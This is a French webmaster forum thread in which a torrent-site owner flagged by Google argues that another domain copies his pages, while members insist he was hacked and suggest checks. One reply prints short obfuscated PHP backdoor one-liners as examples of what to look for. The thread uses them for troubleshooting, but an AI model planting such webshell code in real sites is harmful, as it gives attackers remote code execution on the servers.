Messages: 31

Enregistré le: 3 Fév 2017

Message le Dim Fév 05, 2017 15:21

UsagiYojimbo a écrit:Il n'intègre pas le cache d'un autre site, tu t'es fait hacker.


J'ai tout vérifier, même les fichiers, il n'y a jamais eu de modification. :(

J'ai tjs le probleme, impossible à régler.

Ceci est le cache Google de http://xxxbbwvids.com/. Il s'agit d'un instantané de la page telle qu'elle était affichée le 2 févr. 2017 23:04:44 GMT.

Le site à cette date, était comme il est actuellement vu que j'étais là. C'est impossible. :evil:
Haut
Messages: 12288

Enregistré le: 23 Nov 2005

Message le Dim Fév 05, 2017 15:23

Et pourtant si le cache correspond à ta page en dehors de ces liens, c'est que tu t'es fait hacker. Que ce soit au niveau des fichiers ou de la Base de Données.
Haut
Messages: 31

Enregistré le: 3 Fév 2017

Message le Dim Fév 05, 2017 16:14

UsagiYojimbo a écrit:Et pourtant si le cache correspond à ta page en dehors de ces liens, c'est que tu t'es fait hacker. Que ce soit au niveau des fichiers ou de la Base de Données.


Comment on fait pour connaitre la méthode utilisé ?

J'ai tout bloqué. :(

J'ai vérifier tous les logs, tout ce qui est possible je ne trouve rien.
Haut
Messages: 8555

Enregistré le: 14 Mai 2003

Message le Dim Fév 05, 2017 16:23

T'as vérifié quoi dans les logs ? Quoi dans le code ? Les eval/... et toutes ces techniques ?
Haut
Messages: 31

Enregistré le: 3 Fév 2017

Message le Dim Fév 05, 2017 16:28

spout a écrit:T'as vérifié quoi dans les logs ? Quoi dans le code ? Les eval/... et toutes ces techniques ?


dans tous les /var/log/auth.log & /var/log/apache2

les fichiers php j'ai un script cron qui m'envoie un mail si y'a la moindre modification de tous les fichiers du repertoire /var/www

Je remarque que le cache de :

https://webcache.googleusercontent.com/search?q=cache:www.omgtorrent.com

C'est pareil ? vu que le .com renvoie en 301 vers le .me
Haut
Messages: 836

Enregistré le: 29 Déc 2007

Message le Dim Fév 05, 2017 16:33

un backdoor peut être présent même sans eval
un backdoor peut être aussi bidon que :
${$_GET['a']}

(à peu de choses près)

edit: voici un exemple de vrai backdoor :
<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['yt']);?>
Haut
Messages: 31

Enregistré le: 3 Fév 2017

Message le Dim Fév 05, 2017 16:41

Y'a pas de backdoor, comme dit plusieurs fois ,les fichiers n'ont pas été modifiés.
Haut
Messages: 836

Enregistré le: 29 Déc 2007

Message le Dim Fév 05, 2017 16:53

scan ton pc avec un antivirus, vérifie que les ips de serveur configurées sur cloudflare sont celles de ton serveur,
change tes mots de passes.
Quelles sont tes méthodes pour affirmer qu'aucun fichier n'a été modifié ?
Haut
Messages: 31

Enregistré le: 3 Fév 2017

Message le Dim Fév 05, 2017 16:56

Je compare, tous les jours, les hashs des fichiers de mon pc à ceux sur le ftp

j'ai vérifié tous les DNS ainsi que des possibles connexion aux interfaces, y'a rien, et je n'ai reçu aucune alerte

le mot de passe root ainsi que le compte utilisateur a été changé

mon pc n'a pas de virus, je ne télécharge aucun fichier sur celui-ci, mais j'ai fait 3 scans différents avec 3 anti virus différent au cas où, y'a rien.


je suis totalement perdu.
Haut
Messages: 12288

Enregistré le: 23 Nov 2005

Message le Dim Fév 05, 2017 16:59

Es-tu au moins sûr de ta tâche cron qui vérifie les fichiers ? Il est aussi possible qu'il y ait eu des ajouts, et des règles supplémentaires dans le htaccess.
Haut
Messages: 31

Enregistré le: 3 Fév 2017

Message le Dim Fév 05, 2017 17:03

UsagiYojimbo a écrit:Es-tu au moins sûr de ta tâche cron qui vérifie les fichiers ? Il est aussi possible qu'il y ait eu des ajouts, et des règles supplémentaires dans le htaccess.


Oui je lance le logiciel tous les jours, il compare tous les hashs des fichier img, css, php, js ...etc sur mon PC et je les compare à ceux sur le serveu, la moindre modification j'ai une alerte.

J'ai re-vérifier quand je l'ai lancé : 29 , 30, 31 janvier, 1,2,3,4,5 février.

J'ai vérifier la configuration de .conf de apache, rien n'a été modifié, vu que la dernière date de modif de septembre 2016 et aucun fichier n'a été copié / déplacer dans le répertoire /etc/apache2

je suis sur que je n'ai pas été hacké.
Haut
Messages: 12288

Enregistré le: 23 Nov 2005

Message le Dim Fév 05, 2017 17:07

Et pourtant, il n'y pas d'autres solutions. Tu as vérifie dans les fichiers la présence de codes suspects ? Des eval(base64( et trucs du genre ?

Et tu as vérifié en contenu en base de donnée ?
Haut
Messages: 31

Enregistré le: 3 Fév 2017

Message le Dim Fév 05, 2017 17:10

UsagiYojimbo a écrit:Et pourtant, il n'y pas d'autres solutions. Tu as vérifie dans les fichiers la présence de codes suspects ? Des eval(base64( et trucs du genre ?

Et tu as vérifié en contenu en base de donnée ?


Oui j'ai vérifié la base de donné, rien de spécial.

J'ai fait un coup de rkhunter, chrootkit & https://github.com/nbs-system/php-malware-finder

j'ai bloqué l'ip de https://usbypass.webcam/ mais vu qu'il utilise cloudflare, c'est inutile :(
Haut
Messages: 31

Enregistré le: 3 Fév 2017

Message le Dim Fév 05, 2017 17:18

ce que je ne comprends, comment on fait pour mettre à jour le cache de google ? lui il y arrive sur un autre domaine, et moi sur mon vrai domaine, j'y arrive pas ...

mon site est foutu alors ? vu que personne sait me renseigner, et moi je suis trop incompétent

quelle solution ai-je concrètement ?

L'iP DU SERVEUR : 89.35.39.197

https://omgtorrent.usbypass.webcam/
Je l'ai bloqué sur cloduflare, on peut voir que c bloqué

pareil pour http://xxxbbwvids.com
Haut
Messages: 2079

Enregistré le: 9 Aoû 2005

Message le Dim Fév 05, 2017 17:53

mon site est foutu alors ? ../.. quelle solution ai-je concrètement ?


Image

C'est de l'humour hein..... :D :D :D :D
Haut
Messages: 31

Enregistré le: 3 Fév 2017

Message le Dim Fév 05, 2017 17:57

vu que j'ai bloqué les 2 sites qui me font chier, peut être que google va accepter de valider mon site

c'est ça que je comprend pas, il veut pas le valider car y'a un virus, alors que c un autre site qui vol mon cache

personne ne peut m'aider ? :(
Haut
Messages: 8555

Enregistré le: 14 Mai 2003

Message le Dim Fév 05, 2017 18:48

Si on t'aide on est complices...
Haut
Messages: 31

Enregistré le: 3 Fév 2017

Message le Dim Fév 05, 2017 18:52

spout a écrit:Si on t'aide on est complices...


Complice de ?

Montre moi ce qui est illégal et je ferme le site.
Haut
Messages: 2079

Enregistré le: 9 Aoû 2005

Message le Dim Fév 05, 2017 19:07

Montre moi ce qui est illégal et je ferme le site.


C'est pourtant simple.... Les torrent ne sont pas illégaux en soi..

En revanche, donner des liens vers des fichiers illégaux l'est... Si ton site donne acces a un contenu illegal, ce qui est le cas, que celui ci soit heberge chez toi ou ailleurs ca ne change rien au fait que c'est toujours illegal.

ET franchement encore utiliser Torrents aujourd'hui, faut vraiment etre nunuche...

Apres c'est comme les excès de vitesse sur l'autoroute, personne ne t'empêcheras de rouler a 200, il est juste interdit de se faire prendre... et tot ou tard....

Et si vraiment tu etais si serein que ca, cette page n'existerai pas :
https://www.omgtorrent.me/comment-filtrer-les-ips-indesirables-sur-bit ... adopi.html

Franchement...

:D
Haut
Messages: 31

Enregistré le: 3 Fév 2017

Message le Dim Fév 05, 2017 19:16

Furtif a écrit:
Montre moi ce qui est illégal et je ferme le site.


C'est pourtant simple.... Les torrent ne sont pas illégaux en soi..

En revanche, donner des liens vers des fichiers illégaux l'est... Si ton site donne acces a un contenu illegal, ce qui est le cas, que celui ci soit heberge chez toi ou ailleurs ca ne change rien au fait que c'est toujours illegal.

ET franchement encore utiliser Torrents aujourd'hui, faut vraiment etre nunuche...

Apres c'est comme les excès de vitesse sur l'autoroute, personne ne t'empêcheras de rouler a 200, il est juste interdit de se faire prendre... et tot ou tard....

Et si vraiment tu etais si serein que ca, cette page n'existerai pas :
https://www.omgtorrent.me/comment-filtrer-les-ips-indesirables-sur-bit ... adopi.html

Franchement...

:D


Alors, aucun lien n'est diffusé, c'est plutôt un attrape nigaud tu comprends ?

Ensuite, des liens comme https://www.vice.com/fr/article/comment-devenir-un-fraudeur-de-cartes-bleues & http://www.konbini.com/fr/tendances-2/fini-les-dealers-je-chope-ma-wee ... -internet/ sont pire que moi je pense

omgtorrent est surement "douteux" je le reconnais, mais pas illégal en soit, on ne propose aucun fichier, et aucun lien vers du contenu illégal, car usenet, c'est du attrape nigaud, y'a des sites pire que les miens, mais vous les aidez quand même :P
Haut
Messages: 2079

Enregistré le: 9 Aoû 2005

Message le Dim Fév 05, 2017 19:27

mais vous les aidez quand même :P


Rôôôôôôôôô WRI repaire de hackers....

c'est plutôt un attrape nigaud tu comprends ?


T'en es fier ? et c'est pire encore, c'est de l'arnaque

y'a des sites pire que les miens,


C'est sûr, il y a toujours pire, ca permet de se donner bonne conscience...

ET comprends bien que je ne te jette pas la pierre, j'ai fait pire il fut un temps.. mais j'ai raccroché mes gants et emprunté la voie de la sagesse il y a un peu plus de 10 ans..
Haut
Messages: 31

Enregistré le: 3 Fév 2017

Message le Dim Fév 05, 2017 19:58

Furtif a écrit:
c'est plutôt un attrape nigaud tu comprends ?


T'en es fier ? et c'est pire encore, c'est de l'arnaque


Pas spécial fier non.
Haut
Messages: 31

Enregistré le: 3 Fév 2017

Message le Dim Fév 05, 2017 21:21

Malgrés tout ce que j'essaie de faire :

Échec de l'examen de http://omgtorrent[.]me/

J'en peux plus :(
Haut
Messages: 457

Enregistré le: 1 Avr 2016

Message le Dim Fév 05, 2017 21:35

Ca dégénère :roll:

On récapitule:
1. le site est hors chartre et ... hors législation (pas trop discuter ... > Boomba)
2. en visitant le site, tout semble correct sauf:
. première vite et pubs hors normes (Patrick ... moi)
. site nettoyé (m'en doute, surement pas) et réponse de SPOUT iden puisque le problème reste.

Ce forum est un espace d'échange et de compréhension: on peut tous (débutant comme vieille bête de WRI) se retrouver avec un problème identique.
C'est pas la première fois cette année que ca part de "hors ...". Personnellement, je suis pas d'accord avec le site et sa thématique mais le type de piratage (copie) peut aider des Webmasters à corriger un problème sur d'autres sites.
> Boomla: les gros MP ne changent pas mon boulot sur WRI (je l'ai effacé sans le lire): il y a 5 ans, ma boîte débordais.
On reprend au début (en oubliant la thématique discutable du site).
Patrick
> Tu attend et nous laisse travailler (merci)
On commence par des trucs simples: les pubs à droite: tu vire temporairement (et pas redemander dans l'heure une redemande Google). analyse anti-virus sur ton PC . malwarebyte. Retransfert le site par FTTp en cheangeant sur l'hébergement tous les codes avant.
Haut
Messages: 31

Enregistré le: 3 Fév 2017

Message le Dim Fév 05, 2017 22:01

patrick_lejeune a écrit:On commence par des trucs simples: les pubs à droite: tu vire temporairement (et pas redemander dans l'heure une redemande Google). analyse anti-virus sur ton PC . malwarebyte. Retransfert le site par FTTp en cheangeant sur l'hébergement tous les codes avant.


Les pubs : je vais les retirer, mais je doutes que ça soit, car ça reste des pubs de régie pubs légitimes, j'en ai déjà parlé avec la personne qui s'occupe de ça, y'a aucun probleme

Analyse anti virus : comme dit plus haut, fait 3 fois avec 3 AV differents, Malware pareil

Changement des mots de passes (2, root et user), màj du serveur, mais il est en constante màj, tous les jours en cron

Restransfert : FTP : fait et refait :O

je vais devoir attendre que google mette à jour son cache :

https://webcache.googleusercontent.com/search?q=cache:www.omgtorrent.me
https://webcache.googleusercontent.com/search?q=cache:omgtorrent.me
Haut
Messages: 12288

Enregistré le: 23 Nov 2005

Message le Dim Fév 05, 2017 22:44

Sauf que si tu n'as rien changé, le problème est toujours là. Tu a lancé des scripts pour tester si tes fichiers étaient corrompus, mais tu as regardé manuellement ?
Haut
Messages: 31

Enregistré le: 3 Fév 2017

Message le Dim Fév 05, 2017 23:01

UsagiYojimbo a écrit:Sauf que si tu n'as rien changé, le problème est toujours là. Tu a lancé des scripts pour tester si tes fichiers étaient corrompus, mais tu as regardé manuellement ?


Honnetement, ça fait 5 jours que je fais tout ce qui est possible faire, j'ai vraiment tout fait.

J'ai même changé de serveur à l'instant.

Je pense qu'il attendre que google mette a jour son cache pour qu'il revalide mon site, je vois que ça.
Haut
Messages: 836

Enregistré le: 29 Déc 2007

Message le Lun Fév 06, 2017 3:56

tu vérifie le contenu de /var/www mais as tu vérifié la config de nginx
Haut
Messages: 31

Enregistré le: 3 Fév 2017

Message le Lun Fév 06, 2017 12:17

madri2 a écrit:tu vérifie le contenu de /var/www mais as tu vérifié la config de nginx


je suis sur Apache2, et oui vérifié :)

Le cache de Google a été purgé apparemment, j'ai fait une nouvelle demande.
Haut
Messages: 31

Enregistré le: 3 Fév 2017

Message le Lun Fév 06, 2017 15:44

Toujours, pas échec

je vais me pendre, je reviens.

J'ai retiré toutes les pubs possibles, le cache a été purgé, et tjs echec, là je ne comprends pas.

J'ai fait tous les scans possibles, sur je ne sais pas combien de PC / navigateur / ip différent(e)s rien rien rien

ALLLLLLLO GOOGLE ? :@
Haut